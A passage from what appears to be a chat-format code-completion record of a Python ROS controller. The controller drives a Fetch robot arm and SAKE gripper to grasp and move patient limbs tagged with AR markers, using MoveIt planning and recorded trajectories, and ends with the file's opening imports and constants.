sake_palm_mesh_file = package_path + \"/meshes/visual/SAKE_Palm_Dual.stl\"\n self._planning_scene.attachMesh('sake_palm', sake_palm_pose, sake_palm_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n # fingers\n sake_finger_1_pose = Pose(Point(0, -0.03, -0.055), Quaternion(0.5, -0.5, 0.5, 0.5))\n sake_finger_1_mesh_file = package_path + \"/meshes/visual/SAKE_Finger.stl\"\n self._planning_scene.attachMesh('sake_finger_1', sake_finger_1_pose, sake_finger_1_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n sake_finger_2_pose = Pose(Point(0, 0.03, -0.055), Quaternion(-0.5, -0.5, -0.5, 0.5))\n sake_finger_2_mesh_file = package_path + \"/meshes/visual/SAKE_Finger.stl\"\n self._planning_scene.attachMesh('sake_finger_2', sake_finger_2_pose, sake_finger_2_mesh_file, \n frame_attached_to, touch_links=frames_okay_to_collide_with)\n else: # use a box to represent the sake gripper\n self._planning_scene.attachBox('sake', 0.03, 0.09, 0.15, 0, 0, -0.05,\n frame_attached_to,\n frames_okay_to_collide_with)\n self._planning_scene.setColor('sake', 1, 0, 1)\n self._planning_scene.sendColors()\n\n # calibrate SAKE gripper\n self.do_sake_gripper_action(\"calibrate\")\n\n def remove_sake_gripper(self):\n \"\"\"\n Removes SAKE gripper from Fetch's gripper, and updates the planning scene.\n \"\"\"\n self.freeze_arm()\n # remove SAKE gripper from Fetch's gripper\n self._fetch_gripper.close() # make sure Fetch's gripper is close\n self._fetch_gripper.open()\n self._sake_gripper_attached = False\n # remove SAKE gripper from the planning scene\n if rospy.get_param(\"use_urdf\"):\n self._planning_scene.removeAttachedObject('sake_palm')\n self._planning_scene.removeAttachedObject('sake_finger_1')\n self._planning_scene.removeAttachedObject('sake_finger_2')\n else:\n self._planning_scene.removeAttachedObject('sake')\n\n def update_env(self, update_octo=True):\n \"\"\"\n Updates the list of markers, and scan the surroundings to build an octomap.\n Returns false if the update fails, true otherwise.\n \"\"\"\n # update markers\n self._reader.update()\n # update octomap\n if update_octo:\n # clear previous octomap\n if not self._clear_octomap():\n return False\n # scan the range: pan -0.75~0.75, tilt 0~0.7\n for i in range(6):\n pan = -0.75 + 0.25 * i\n self._head.pan_tilt(pan, 0)\n rospy.sleep(2)\n self._head.pan_tilt(pan, 0.7)\n rospy.sleep(2)\n self._head.pan_tilt(pan, 0)\n # move the head back to initial position\n self._head.pan_tilt(0, 0.7)\n return True\n\n def do_sake_gripper_action(self, command):\n # publish response message\n if command == \"calibrate\":\n self._publish_server_response(msg=\"Calibrating SAKE gripper, please wait...\")\n elif command == \"h_close\":\n self._publish_server_response(msg=\"Hard closing SAKE gripper, please wait...\")\n elif command == \"s_close\":\n self._publish_server_response(msg=\"Soft closing SAKE gripper, please wait...\")\n elif command == \"open\":\n self._publish_server_response(msg=\"Opening SAKE gripper, please wait...\")\n else: # [percentage open, effort]\n self._publish_server_response(msg=\"Closing SAKE gripper, please wait...\")\n # publish command\n self._sake_gripper_pub.publish(EzgripperAccess(type=command))\n # wait for the action to finish if in real\n if not rospy.get_param(\"use_sim\"):\n while not self._sake_gripper_action_finished:\n continue\n # finished, reset\n self._sake_gripper_action_finished = False\n\n def reset(self):\n \"\"\" Moves arm to its initial position and calibrates gripper \"\"\"\n self.freeze_arm()\n self._arm.move_to_joint_goal(self._arm_initial_poses, replan=True)\n self.do_sake_gripper_action(\"calibrate\")\n self._robot_stopped = False\n self._reset_program_state()\n\n def estop(self):\n \"\"\" Emergency stop. \"\"\"\n self.relax_arm()\n self._robot_stopped = True\n self._reset_program_state()\n\n def preview_body_part_with_id(self, id_num):\n \"\"\"\n Publishes visualization markers to mark the body part with given id.\n \"\"\"\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n # visualize goal pose\n marker = Marker(type=Marker.CUBE,\n id=0,\n pose=raw_pose.pose.pose,\n scale=Vector3(0.06, 0.06, 0.06),\n header=raw_pose.header,\n color=ColorRGBA(1.0, 0.75, 0.3, 0.8))\n self._viz_pub.publish(marker)\n\n def goto_part_with_id(self, id_num):\n \"\"\" \n Moves arm above a body part specified by id_num.\n Returns true if succeed, false otherwise.\n \"\"\"\n self.freeze_arm()\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n # found marker, move towards it\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n\n # OPTION 1: pregrasp ---> grasp\n # highlight and move to the pre-grasp pose\n pre_grasp_offset = self._db.get(\"PREGRASP\")\n pre_grasp_pose = self._move_arm_relative(raw_pose.pose.pose, raw_pose.header, offset=pre_grasp_offset, preview_only=True)\n self.highlight_waypoint(pre_grasp_pose, WAYPOINT_HIGHLIGHT_COLOR)\n if self._move_arm(pre_grasp_pose, final_state=False):\n # highlight and move to the grasp pose, clear octomap to ignore collision only at this point\n if self._clear_octomap():\n return self._move_arm(self._get_goto_pose(raw_pose), final_state=False, seed_state=self._get_seed_state())\n \n # # OPTION 2: grasp\n # return self._move_arm(self._get_goto_pose(raw_pose), final_state=False)\n\n # marker with id_num is not found, or some error occured\n return False\n\n def preview_action_with_abbr(self, abbr, id_num):\n \"\"\"\n Publishes visualization markers to preview waypoints on the trajectory with given abbr.\n Saves waypoints extracted from bag file to database if the entry \"abbr\" doesn't exist.\n Returns the colors of waypoints with respect to the ar tag. Records the positions of\n waypoints with respect to the ar tag.\n \"\"\"\n # clear previous markers\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # check the database for the action\n waypoints = self._db.get(abbr)\n if waypoints == None or len(waypoints) == 0:\n waypoints = self._save_traj_to_db(abbr, id_num)\n\n self._preview_action_abbr = \"\"\n self._preview_traj = []\n waypoints_with_respect_to_tag = []\n if waypoints:\n raw_pose = self._get_tag_with_id(id_num)\n if raw_pose is not None:\n prev_pose = self._get_goto_pose(raw_pose)\n # markers\n marker_arr = []\n # marker color gradient\n colors = list(START_COLOR.range_to(END_COLOR, len(waypoints)))\n # visualize the trajectory\n for i in range(len(waypoints)):\n # visualize the current waypoint\n marker = Marker(type=Marker.ARROW,\n id=i,\n pose=prev_pose.pose,\n scale=TRAJ_HIGHLIGHT_SCALE,\n header=prev_pose.header,\n color=ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8))\n marker_arr.append(marker)\n # record the waypoint\n waypoints_with_respect_to_tag.append(str(colors[i].hex))\n self._preview_traj.append(prev_pose)\n\n if i < len(waypoints) - 1:\n # calculate offset between the current point on the trajectory and the next point\n r_pos = waypoints[i].pose # current point\n r_mat = self._pose_to_transform(r_pos)\n w_mat = self._pose_to_transform(waypoints[i + 1].pose)\n offset = np.dot(np.linalg.inv(r_mat), w_mat)\n prev_pose = self._move_arm_relative(prev_pose.pose, prev_pose.header, offset=offset, preview_only=True)\n\n # publish new markers\n self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))\n # record the action name\n self._preview_action_abbr = abbr\n\n return waypoints_with_respect_to_tag\n\n def highlight_waypoint(self, highlight_pose, color):\n \"\"\" Publishes a marker at the specified location. \"\"\"\n marker = Marker(type=Marker.ARROW,\n id=0,\n pose=highlight_pose.pose,\n scale=WAYPOINT_HIGHLIGHT_SCALE,\n header=highlight_pose.header,\n color=color)\n self._viz_pub.publish(marker)\n\n def edit_waypoint(self, waypoint_id, delta_x, delta_y, camera):\n \"\"\" Temporarily saves the changes to the specified waypoint, and highlights the resulting pose. \"\"\"\n # calculate the resulting pose\n new_pose = self._compute_pose_by_delta(self._preview_traj[waypoint_id], delta_x, delta_y, camera)\n # save the new pose\n self._preview_traj[waypoint_id] = new_pose\n\n # preview the new trajectory\n marker_arr = []\n # marker color gradient\n colors = list(START_COLOR.range_to(END_COLOR, len(self._preview_traj)))\n # visualize the trajectory\n for i in range(len(self._preview_traj)):\n # highlight the waypoint that is being editing\n color = WAYPOINT_HIGHLIGHT_COLOR if i == waypoint_id else ColorRGBA(colors[i].red, colors[i].green, colors[i].blue, 0.8)\n marker = Marker(type=Marker.ARROW,\n id=i,\n pose=self._preview_traj[i].pose,\n scale=TRAJ_HIGHLIGHT_SCALE,\n header=self._preview_traj[i].header,\n color=color)\n marker_arr.append(marker)\n # clear previous markers\n self._viz_markers_pub.publish(MarkerArray(markers=[]))\n # publish new markers\n self._viz_markers_pub.publish(MarkerArray(markers=marker_arr))\n\n def modify_traj_in_db(self, cancel_change=True):\n \"\"\" Overwrites the previous trajectory in database. \"\"\"\n if not cancel_change:\n self._db.delete(self._preview_action_abbr)\n self._db.add(self._preview_action_abbr, self._preview_traj)\n self._preview_action_abbr = \"\"\n self._preview_traj = []\n\n def do_action_with_abbr(self, abbr, id_num):\n \"\"\" \n Moves arm to perform the action specified by abbr, save the trajectory to database if neccessary.\n Returns true if succeed, false otherwise.\n \"\"\"\n action_result = False\n if self._prepare_action(abbr, id_num):\n action_result = self._follow_traj_step_by_step(0)\n return action_result\n\n def do_action_with_abbr_smooth(self, abbr, id_num):\n \"\"\"\n Moves arm to perform the action specified by abbr smoothly.\n Returns true if succeed, false otherwise.\n \"\"\"\n action_result = False\n if self._prepare_action(abbr, id_num):\n # calculate a smooth trajectory passing through all the waypoints and move the arm\n action_result = self._move_arm(None, trajectory_waypoint=self._preview_traj, final_state=True, seed_state=self._get_seed_state())\n if not action_result:\n # smooth action fails, do the action step by step instead\n action_result = self._follow_traj_step_by_step(0)\n return action_result\n\n def pause_action(self):\n \"\"\" Pause the current action. \"\"\"\n # self.relax_arm()\n print(self._current_waypoint_id)\n\n def continue_action(self):\n \"\"\" Continue the current action. \"\"\"\n # self.freeze_arm()\n print(self._current_waypoint_id)\n # if self._current_waypoint_id > -1:\n # # continue going to the next waypoint\n # self._follow_traj_step_by_step(self._current_waypoint_id + 1)\n\n def record_action_with_abbr(self, abbr, id_num):\n \"\"\"\n Records the pose offset named abbr relative to tag, always overwrites the previous entry (if exists).\n Returns true if succeeds, false otherwise.\n \"\"\"\n # get tag pose\n tag_pose = self._get_tag_with_id(id_num)\n if tag_pose == None:\n return False\n # get the pose to be recorded: transformation lookup\n (position, quaternion) = self._tf_lookup()\n if (position, quaternion) == (None, None):\n return False\n # get the transformation, record it\n record_pose = Pose()\n record_pose.position.x = position[0]\n record_pose.position.y = position[1]\n record_pose.position.z = position[2]\n record_pose.orientation.x = quaternion[0]\n record_pose.orientation.y = quaternion[1]\n record_pose.orientation.z = quaternion[2]\n record_pose.orientation.w = quaternion[3]\n # get the offset between the tag pose and the pose to be recorded\n t_pos = tag_pose.pose.pose\n t_mat = self._pose_to_transform(t_pos)\n w_mat = self._pose_to_transform(record_pose)\n offset = np.dot(np.linalg.inv(t_mat), w_mat)\n # add the offset to database\n self._db.add(abbr, offset)\n self._db.save()\n return True\n\n def relax_arm(self):\n \"\"\" Relax the robot arm, if the program is running on the real robot \"\"\"\n if not rospy.get_param(\"use_sim\") and not self._arm_relaxed:\n goal = QueryControllerStatesGoal()\n state = ControllerState()\n state.name = 'arm_controller/follow_joint_trajectory'\n state.state = ControllerState.STOPPED\n goal.updates.append(state)\n self._controller_client.send_goal(goal)\n self._controller_client.wait_for_result()\n self._arm_relaxed = True\n\n def freeze_arm(self):\n \"\"\" Freeze the robot arm, if the program is running on the real robot \"\"\"\n if not rospy.get_param(\"use_sim\") and self._arm_relaxed:\n goal = QueryControllerStatesGoal()\n state = ControllerState()\n state.name = 'arm_controller/follow_joint_trajectory'\n state.state = ControllerState.RUNNING\n goal.updates.append(state)\n self._controller_client.send_goal(goal)\n self._controller_client.wait_for_result()\n self._arm_relaxed = False\n\n def get_list(self):\n \"\"\" Returns a list of AR tags recognized by the robot. \"\"\"\n return self._reader.get_list()\n\n def get_db_list(self):\n \"\"\" Returns list of entries in the database. \"\"\"\n return self._db.list()\n\n def get_db_entry(self, entry):\n \"\"\" Returns values associated with the given entry in the database. \"\"\"\n return self._db.get(entry)\n\n def delete_db_entry(self, name):\n \"\"\" Delete the database entry with the given name \"\"\"\n self._db.delete(name)\n self._db.save()\n\n def web_app_request_callback(self, msg):\n \"\"\"\n Parse the request given by the wee application, and call the corresponding functions.\n \"\"\"\n request_type, request_args = msg.type, msg.args\n\n print(\"type: \" + request_type)\n print(\"args: \" + str(request_args) + \"\\n\")\n\n if request_type == \"attach\":\n return_msg = \"SAKE gripper has already attached!\"\n if not self._sake_gripper_attached:\n self._publish_server_response(msg=\"Attaching SAKE gripper...\")\n self.attach_sake_gripper()\n return_msg = \"SAKE gripper attached\"\n self._publish_server_response(status=True, msg=return_msg)\n\n elif request_type == \"remove\":\n return_msg = \"SAKE gripper has already removed!\"\n if self._sake_gripper_attached:\n self._publish_server_response(msg=\"Removing SAKE gripper...\")\n self.remove_sake_gripper()\n return_msg = \"SAKE gripper removed\"\n self._publish_server_response(status=True, msg=return_msg)\n\n elif not self._sake_gripper_attached:\n # need to attach SAKE gripper first\n self._publish_server_response(status=True, msg=\"Please attach SAKE gripper first!\")\n\n else:\n # SAKE gripper has already attached\n if request_type == \"record\":\n self._publish_server_response(msg=\"Recording the current scene...\")\n if self.update_env(update_octo=bool(request_args[0])):\n # get the list of body parts and actions\n parts = self.get_list()\n parts_info, actions_info = [], []\n if len(parts):\n for part in parts:\n if part.id in BODY_PARTS and part.id in ACTIONS:\n parts_info.append(str(part.id) + \":\" + BODY_PARTS[part.id])\n for action in ACTIONS[part.id]:\n actions_info.append(str(part.id) + \":\" + action + \":\" + ABBR[action])\n self._publish_server_response(type=\"parts\", args=parts_info)\n self._publish_server_response(type=\"actions\", status=True, args=actions_info, msg=\"Scene recorded\")\n else:\n self._publish_server_response(status=True, msg=\"Failed to record the current scene!\")\n\n elif request_type == \"prev_id\" and len(request_args) == 1:\n id_num = int(request_args[0]) # convert from string to int\n self._publish_server_response(status=True, msg=\"Previewing \" + BODY_PARTS[id_num] + \"...\")\n self.preview_body_part_with_id(id_num)\n\n elif request_type == \"prev\" and len(request_args) == 2:\n abbr, id_num = request_args[0], int(request_args[1])\n waypoints_with_respect_to_tag = self.preview_action_with_abbr(abbr, id_num)\n self._publish_server_response(type=request_type, status=True, args=waypoints_with_respect_to_tag, \n msg=\"Previewing the action with respect to body part \" + BODY_PARTS[id_num] + \"...\")\n\n elif request_type == \"highlight\" and len(request_args) == 1:\n waypoint_id = int(request_args[0])\n self.highlight_waypoint(self._preview_traj[waypoint_id], WAYPOINT_HIGHLIGHT_COLOR)\n self._publish_server_response(status=True)\n\n elif request_type == \"edit\" and len(request_args) == 4:\n waypoint_id, delta_x, delta_y, camera = int(request_args[0]), int(request_args[1]), int(request_args[2]), request_args[3]\n self.edit_waypoint(waypoint_id, delta_x, delta_y, camera)\n self._publish_server_response(status=True)\n\n elif request_type == \"save_edit\" or request_type == \"cancel_edit\":\n if request_type == \"save_edit\":\n self.modify_traj_in_db(cancel_change=False)\n else:\n self.modify_traj_in_db() # cancel all the changes\n self._publish_server_response(status=True)\n\n elif request_type == \"reset\":\n self._publish_server_response(msg=\"Resetting...\")\n self.reset()\n self._publish_server_response(status=True, msg=\"Done\")\n\n elif not self._robot_stopped: \n # moveit controller is running\n if request_type == \"go\" and len(request_args) == 1:\n self._do_position_ready = False\n id_num = int(request_args[0])\n self._publish_server_response(msg=\"Moving towards body part \" + BODY_PARTS[id_num] + \"...\")\n if self.goto_part_with_id(id_num):\n self._grasp_position_ready = True\n self._do_position_id = id_num\n self._publish_server_response(status=True, msg=\"Done, ready to grasp\")\n else:\n self._publish_server_response(status=True, msg=\"Fail to move!\")\n\n elif request_type == \"grasp\" and self._grasp_position_ready and len(request_args) == 1:\n self._publish_server_response(msg=\"Grasping...\")\n self._grasp_type = \"h_close\" if request_args[0] == \"h\" else \"s_close\"\n self.do_sake_gripper_action(self._grasp_type)\n self._grasp_position_ready = False\n self._do_position_ready = True\n self._publish_server_response(status=True, msg=\"Grasped\")\n\n elif request_type == \"relax\":\n self._publish_server_response(msg=\"Relaxing arm...\")\n self.relax_arm()\n self._publish_server_response(status=True, msg=\"Arm relaxed\")\n\n elif request_type == \"freeze\":\n self._publish_server_response(msg=\"Freezing arm...\")\n self.freeze_arm()\n self._publish_server_response(status=True, msg=\"Arm froze\")\n\n elif (request_type == \"do\" or request_type == \"do_s\") and len(request_args) > 0:\n action_abbr = request_args[0]\n return_msg = \"Action failed!\"\n if self._do_position_ready:\n # performing mode\n self._publish_server_response(msg=\"Performing \" + action_abbr + \"...\")\n result = False\n if request_type == \"do\": # step by step\n result = self.do_action_with_abbr(action_abbr, self._do_position_id)\n else: # \"do_s\": smooth\n result = self.do_action_with_abbr_smooth(action_abbr, self._do_position_id)\n if result:\n return_msg = \"Action succeeded\"\n else:\n return_msg = \"Unknown action for body part with ID: \" + str(self._do_position_id)\n # always release gripper\n self._publish_server_response(msg=\"Releasing the gripper...\")\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n self._do_position_ready = False\n self._publish_server_response(status=True, msg=return_msg)\n\n elif request_type == \"open\":\n self._publish_server_response(msg=\"Opening the gripper...\")\n self.do_sake_gripper_action(\"open\")\n self._do_position_ready = False\n self._publish_server_response(status=True, msg=\"Gripper opened\")\n\n elif request_type == \"stop\":\n self._publish_server_response(msg=\"Stopping the robot...\")\n self.estop()\n self._publish_server_response(status=True, msg=\"Robot stopped, please \\\"RESET\\\" if you want to continue using it\")\n\n elif request_type == \"run\" and len(request_args) == 3:\n #######################################################################################\n\n\n\n\n\n ############## todo\n # start execution from the currect step in the action trajectory\n\n\n\n # start execution from the very beginning\n self.web_app_request_callback(WebAppRequest(type=\"go\", args=[request_args[0]]))\n self.web_app_request_callback(WebAppRequest(type=\"grasp\", args=[request_args[1]]))\n self.web_app_request_callback(WebAppRequest(type=\"do_s\", args=[request_args[2]]))\n self._publish_server_response(type=request_type, status=True, msg=\"DONE\")\n\n elif request_type == \"step\":\n return_msg = \"Ready!\"\n waypoint_id = int(request_args[0])\n if waypoint_id == -1: # goto tag and grasp\n self.web_app_request_callback(WebAppRequest(type=\"go\", args=[request_args[1]]))\n self.web_app_request_callback(WebAppRequest(type=\"grasp\", args=[request_args[2]]))\n else: # move along trajectory\n self._grasp_type = \"h_close\" if request_args[1] == \"h\" else \"s_close\"\n return_msg = \"Fail to reach waypoint #\" + request_args[0]\n result = self._goto_waypoint_on_traj_with_id(waypoint_id)\n if waypoint_id == len(self._preview_traj) - 1: # last point\n self._publish_server_response(msg=\"Releasing the gripper...\")\n self.do_sake_gripper_action(\"40 \" + self._sake_gripper_effort)\n self._do_position_ready = False\n if result:\n return_msg = \"Reached waypoint #\" + request_args[0]\n self._publish_server_response(type=request_type, status=True, args=[request_args[0]], msg=return_msg)\n\n elif request_type == \"pause\":\n self._publish_server_response(msg=\"Pausing...\")\n self.pause_action()\n self._publish_server_response(type=request_type, status=True, msg=\"PAUSED\")\n\n elif request_type == \"continue\":\n self._publish_server_response(msg=\"Continuing...\")\n self.continue_action()\n self._publish_server_response(type=request_type, status=True, msg=\"CONTINUED\")\n\n else: \n self._publish_server_response(status=True, msg=\"Invalid command :)\")\n\n\n def _reset_program_state(self):\n \"\"\" Resets program state. \"\"\"\n self._grasp_position_ready = False\n self._do_position_ready = False\n self._do_position_id = -1\n\n def _clear_octomap(self):\n \"\"\" Clears the octomap. Returns true if succeeds, false otherwise. \"\"\"\n rospy.wait_for_service('clear_octomap')\n try:\n clear_octo = rospy.ServiceProxy('clear_octomap', Empty)\n clear_octo()\n except rospy.ServiceException, e:\n rospy.logerr('Fail clear octomap: {}'.format(e))\n return False\n return True\n\n def _move_arm_relative(self, ref_pose, ref_header, offset=None, preview_only=False, seed_state=None):\n \"\"\" \n Calculates the coordinate of the goal by adding the offset to the given reference pose, \n and moves the arm to the goal. If it's only for previewing, returns the goal pose,\n else returns the result of the movement.\n \"\"\"\n goal_pose = PoseStamped()\n goal_pose.header = ref_header\n\n if offset is not None:\n # current pose is valid, perform action\n t_mat = self._pose_to_transform(ref_pose)\n # compute the new coordinate\n new_trans = np.dot(t_mat, offset)\n pose = self._transform_to_pose(new_trans)\n goal_pose.pose = pose\n else:\n goal_pose.pose = ref_pose\n \n if preview_only:\n return goal_pose\n else:\n # move to the goal position while avoiding unreasonable trajectories!\n # close SAKE gripper again to ensure the limb is grasped\n self.do_sake_gripper_action(self._grasp_type)\n # visualize goal pose\n self.highlight_waypoint(goal_pose, ColorRGBA(1.0, 1.0, 0.0, 0.8))\n return goal_pose if self._move_arm(goal_pose, final_state=True, seed_state=seed_state) else None\n\n def _move_arm(self, goal_pose, trajectory_waypoint=[], final_state=False, seed_state=None):\n \"\"\" \n Moves arm to the specified goal_pose. Returns true if succeed, false otherwise.\n \"\"\"\n error = None\n if not final_state:\n # simply go to the goal_pose\n error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)\n # record the current pose because we still have the \"do action\" step to do\n self._current_pose = goal_pose\n else:\n # go to goal_pose while avoiding unreasonable trajectories!\n if trajectory_waypoint:\n # create an array of waypoints\n waypoints = []\n for tw in trajectory_waypoint:\n waypoints.append(tw.pose)\n # using trajectory waypoints to perform a smooth motion\n plan = self._arm.get_cartesian_path(self._moveit_group, seed_state, waypoints)\n if plan:\n error = self._arm.execute_trajectory(self._moveit_group, plan)\n else:\n error = 'PLANNING_FAILED'\n else:\n # using seed\n error = self._arm.move_to_pose_with_seed(goal_pose, seed_state, [], **self._kwargs)\n if error is not None:\n # planning with seed failed, try without seed \n # moveit: move group commander\n # check if the pose can be reached in a straight line motion\n plan = self._arm.straight_move_to_pose_check(self._moveit_group, goal_pose)\n if plan:\n error = self._arm.straight_move_to_pose(self._moveit_group, plan)\n else:\n error = 'PLANNING_FAILED'\n\n # reset current pose to none\n self._current_pose = None\n \n if error is not None:\n self._arm.cancel_all_goals()\n rospy.logerr(\"Fail to move: {}\".format(error))\n return False\n # succeed\n return True\n\n def _transform_to_pose(self, matrix):\n \"\"\" Matrix to pose \"\"\"\n pose = Pose()\n trans_vector = tft.translation_from_matrix(matrix)\n pose.position = Point(trans_vector[0], trans_vector[1], trans_vector[2])\n quartern = tft.quaternion_from_matrix(matrix)\n pose.orientation = Quaternion(quartern[0], quartern[1], quartern[2], quartern[3])\n return pose\n\n def _pose_to_transform(self, pose):\n \"\"\" Pose to matrix \"\"\"\n q = pose.orientation\n matrix = tft.quaternion_matrix([q.x, q.y, q.z, q.w])\n matrix[0, 3] = pose.position.x\n matrix[1, 3] = pose.position.y\n matrix[2, 3] = pose.position.z\n return matrix\n\n def _get_tag_with_id(self, id_num):\n \"\"\" Returns the AR tag with the given id, returns None if id not found \"\"\"\n tag_pose = self._reader.get_tag(id_num)\n if tag_pose == None:\n rospy.logerr(\"AR tag lookup error: Invalid ID# \" + str(id_num))\n return tag_pose\n\n def _tf_lookup(self):\n \"\"\" \n Lookups the transformation between \"base_link\" and \"wrist_roll_link\" (retry up to TRANSFROM_LOOKUP_RETRY times),\n and returns the result\n \"\"\"\n (position, quaternion) = (None, None)\n count = 0\n while True:\n if (position, quaternion) != (None, None): # lookup succeeds\n return (position, quaternion)\n elif count >= TRANSFROM_LOOKUP_RETRY: # exceeds maximum retry times\n rospy.logerr(\"Fail to lookup transfrom information between 'base_link' and 'wrist_roll_link'\")\n return (None, None)\n else: # try to lookup transform information\n try:\n (position, quaternion) = self._tf_listener.lookupTransform('base_link', 'wrist_roll_link', rospy.Time(0))\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n count += 1\n continue\n\n def _get_goto_pose(self, ar_pose):\n \"\"\"\n Calculates the grasp pose of gripper given the AR tag pose, returns the gripper pose.\n \"\"\"\n grasp_offset = self._db.get(\"GRASP\")\n goal_pose = self._move_arm_relative(ar_pose.pose.pose, ar_pose.header, offset=grasp_offset, preview_only=True)\n self.highlight_waypoint(goal_pose, WAYPOINT_HIGHLIGHT_COLOR)\n return goal_pose\n\n def _prepare_action(self, abbr, id_num):\n \"\"\"\n Previews the action trajectory, moves robot arm to the starting position of the action and\n grasps the limb. Returns true if succeeds, false otherwise.\n \"\"\"\n # preview action\n self.preview_action_with_abbr(abbr, id_num)\n # freeze arm for moveit\n self.freeze_arm()\n # get AR tag information\n tag_pose = self._get_tag_with_id(id_num)\n if tag_pose == None or self._current_pose == None:\n return False\n # move arm to the starting position relative to AR tag\n if not self._preview_traj or not self.goto_part_with_id(id_num):\n rospy.logerr(\"Fail to move to the starting position for action: \" + abbr)\n return False\n return True\n\n def _follow_traj_step_by_step(self, start_id):\n \"\"\"\n Follows the current trajectory step by step. Returns true if at least one waypoint is reached, false otherwise.\n \"\"\"\n succeed = False\n for i in range(start_id, len(self._preview_traj) - 1):\n goal_pose = self._preview_traj[i + 1]\n # move arm relative to the previous pose (use seed), skip the current waypoint if the current action fails\n action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())\n # record the current waypoint id\n self._current_waypoint_id = i + 1\n # check action result\n if action_result is not None:\n succeed = True # the whole action succeeds if at least one pose is reached\n else:\n rospy.logerr(\"Fail to reach waypoint \" + str(i + 1))\n # action finished, reset the current waypoint\n self._current_waypoint_id = -1\n return succeed\n\n def _goto_waypoint_on_traj_with_id(self, waypoint_id):\n \"\"\"\n Go to the specific waypoint on the trajectory. Returns true if succeeds, false otherwise.\n \"\"\"\n succeed = False\n if -1 < waypoint_id < len(self._preview_traj):\n goal_pose = self._preview_traj[waypoint_id]\n action_result = self._move_arm_relative(goal_pose.pose, goal_pose.header, seed_state=self._get_seed_state())\n if action_result is not None:\n succeed = True\n else:\n rospy.logerr(\"Fail to reach waypoint \" + str(i + 1))\n return succeed\n\n def _save_traj_to_db(self, abbr, id_num):\n \"\"\"\n Checks bag file for the trajectory with given abbr, calculate waypoints and save those points to the database.\n Returns the calculated waypoints if succeed, none otherwise.\n \"\"\"\n # check bag files for the trajectory\n bag_file_path = os.path.join(self._bag_file_dir, abbr.lower() + '.bag')\n bag = rosbag.Bag(bag_file_path)\n waypoints = []\n prev_msg = []\n # get the trajectory from bag file\n for topic, msg, t in bag.read_messages(topics=['/joint_states']):\n joint_state = list(msg.position[6:13])\n if len(joint_state) != 0 and (len(prev_msg) == 0 or np.abs(np.sum(np.subtract(joint_state, prev_msg))) > rospy.get_param(\"arm_traj_threshold\")):\n prev_msg = joint_state\n # use forward kinematics to find the wrist position\n point = self._arm.compute_fk(msg)\n if point:\n # add the result position\n waypoints.append(point[0])\n bag.close()\n\n if len(waypoints) < 2:\n # this trajectory is empty because it only contains the starting point\n rospy.logerr(\"Empty trajectory for action: \" + abbr)\n return None\n \n # add the result position to database\n self._db.add(abbr, waypoints)\n self._db.save()\n return waypoints\n\n def _publish_server_response(self, type=\"\", status=False, args=[], msg=\"\"):\n \"\"\" Publishes the server response message, and prints the message in console if needed. \"\"\"\n if rospy.get_param(\"console_output\"):\n print(msg)\n self._web_app_response_pub.publish(WebAppResponse(type=type, status=status, args=args, msg=msg))\n\n def _compute_pose_by_delta(self, current_pose, delta_x, delta_y, camera):\n \"\"\" \n Computes and returns the new pose with respect to base_link after applying \n delta_x and delta_y to the current pose in the specified camera view.\n \"\"\"\n x_distance, y_distance = dpx_to_distance(delta_x, delta_y, camera, current_pose, True)\n return delta_modified_stamped_pose(x_distance, y_distance, camera, current_pose)\n\n def _get_seed_state(self):\n \"\"\" Returns the current arm joint state as the seed used in motion planning. \"\"\"\n seed_state = JointState()\n seed_state.name = self._arm_joints.names()\n seed_state.position = self._arm_joints.values()\n return seed_state\n\n def _set_sake_gripper_action_status(self, msg):\n \"\"\" This is the callback of sake gripper status. \"\"\"\n self._sake_gripper_action_finished = True\n```<|memory_end|>",
"role": "user"
}
] |
```python
#! /usr/bin/env python
import rospy
import math
from pprint import pprint
import numpy as np
import fetch_api
from std_msgs.msg import String, Header, ColorRGBA, Bool
from std_srvs.srv import Empty
from image_geometry import PinholeCameraModel
import tf
import tf.transformations as tft
# from tf import TransformBroadcaster
from geometry_msgs.msg import Pose, PoseStamped, Quaternion, Point, Vector3
from interactive_markers.interactive_marker_server import InteractiveMarkerServer
from visualization_msgs.msg import Marker, MarkerArray, InteractiveMarker, InteractiveMarkerControl, InteractiveMarkerFeedback
from sensor_msgs.msg import PointCloud2, JointState
from ar_track_alvar_msgs.msg import AlvarMarkers
from limb_manipulation_msgs.msg import EzgripperAccess, WebAppRequest, WebAppResponse
import moveit_commander
from moveit_python import PlanningSceneInterface
from moveit_msgs.msg import OrientationConstraint
import subprocess
from robot_controllers_msgs.msg import QueryControllerStatesAction, QueryControllerStatesGoal, ControllerState
from database import Database
import actionlib
import rosbag
import os
from colour import Color
import sys
from shared_teleop_functions_and_vars import dpx_to_distance, delta_modified_stamped_pose
import copy
# maximum times to retry if a transform lookup fails
TRANSFROM_LOOKUP_RETRY = 10
# colors for trajectory visualization
START_COLOR = Color("Orange")
END_COLOR = Color("Blue")
TRAJ_HIGHLIGHT_SCALE = Vector3(0.05, 0.008, 0.008)
WAYPOINT_HIGHLIGHT_SCALE = Vector3(0.05, 0.01, 0.01) # Vector3(0.055, 0.009, 0.009)
WAYPOINT_HIGHLIGHT_COLOR = ColorRGBA(1.0, 0.0, 0.0, 0.8)
# body parts and their corresponding ID# and actions
BODY_PARTS = {0: "right wrist", 1: "lower right leg",
2: "left wrist", 3: "lower left leg"}
ACTIONS = {0: ["right arm elbow extension", "right arm elbow flexion"],
1: ["right leg abduction and adduction"], # , "right leg medial rotation", "right leg lateral rotation"],
2: ["left arm elbow extension", "left arm elbow flexion"],
3: ["left leg abduction and adduction"] #, "left leg medial rotation", "left leg lateral rotation"]
}
ABBR = {"right leg abduction and adduction": "RLAA",
# "right leg medial rotation": "RLMR", "right leg lateral rotation": "RLLR",
"left abduction and adduction": "LLAA",
# "left leg medial rotation": "LLMR", "left leg lateral rotation": "LLLR",
